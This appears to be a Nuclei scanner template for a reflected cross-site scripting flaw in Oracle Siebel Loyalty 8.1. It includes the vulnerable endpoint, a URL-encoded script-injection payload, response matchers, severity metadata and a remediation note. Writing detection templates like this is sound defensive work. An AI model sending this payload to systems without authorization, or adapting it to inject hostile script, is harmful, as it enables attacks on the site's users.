id: oracle-siebel-xss

info:
  name: Oracle Siebel Loyalty 8.1 - Cross-Site Scripting
  author: dhiyaneshDK
  severity: high
  description: A vulnerability in Oracle Siebel Loyalty allows remote unauthenticated attackers to inject arbitrary Javascript code into the responses returned by the '/loyalty_enu/start.swe/' endpoint.
  remediation: Upgrade to Siebel Loyalty version 8.2 or later.
  reference:
    - https://packetstormsecurity.com/files/86721/Oracle-Siebel-Loyalty-8.1-Cross-Site-Scripting.html
    - https://exploit-db.com/exploits/47762
    - https://docs.oracle.com/cd/E95904_01/books/Secur/siebel-security-hardening.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  metadata:
    max-request: 1
  tags: xss,oracle,siebel,packetstorm,edb

http:
  - method: GET
    path:
      - '{{BaseURL}}/loyalty_enu/start.swe/%3E%22%3E%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - '</script><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

# digest: 4b0a00483046022100b502f96a44f7a096e18aeaebcf5d19aad95dd6d9a5d87ef3d60c2cd04063e490022100f05a83db1c2d4407f2d73f596cba04442b07daaf9310e82c70cb79f7bbb2c971:922c64590222798bb761d5b6d8e72950
